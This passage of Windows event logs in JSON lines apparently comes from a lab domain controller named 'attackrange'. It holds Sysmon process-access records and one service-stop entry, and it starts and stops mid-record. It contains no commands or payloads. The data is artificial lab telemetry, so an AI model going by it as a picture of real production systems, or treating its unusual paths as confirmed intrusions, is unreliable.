06:51:29.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3149,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3150,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3151,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3152,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3153,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:29.700\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10F1-5F25-0000-001095480500}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:29.700","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10F1-5F25-0000-001095480500}","TargetProcessId":"4780","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3154,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:30.388\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:30.388","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3155,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:31.390\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:31.390","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76852,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The MapsBroker service entered the stopped state.","param1":"MapsBroker","param2":"stopped","EventReceivedTime":"2020-08-01 06:51:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3156,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:32.391\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 